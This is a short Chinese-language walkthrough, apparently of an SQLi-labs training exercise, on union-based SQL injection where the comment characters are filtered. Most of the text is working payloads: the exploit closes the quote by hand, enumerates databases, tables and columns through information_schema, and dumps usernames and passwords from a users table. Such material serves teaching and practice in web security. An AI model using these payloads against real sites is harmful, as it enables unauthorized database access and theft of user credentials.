0x01 判断注入类型
输入'报错,双引号未报错
号闭合仍然报错,#、--号被过滤了
闭合单引号
0x02 判断数据库名
使用联合查询判断数据库名
?id=-1'union select 1,(select group_concat(schema_name)from information_schema.schemata),3 and '1'='1
0x03 判断表名
?id=-1'union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 and '1'='1
0x04 判断列名
?id=-1'union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3 and '1'='1
0x05 得到数据
?id=-1'union select 1,(select group_concat(username,password)from users),3 and '1'='1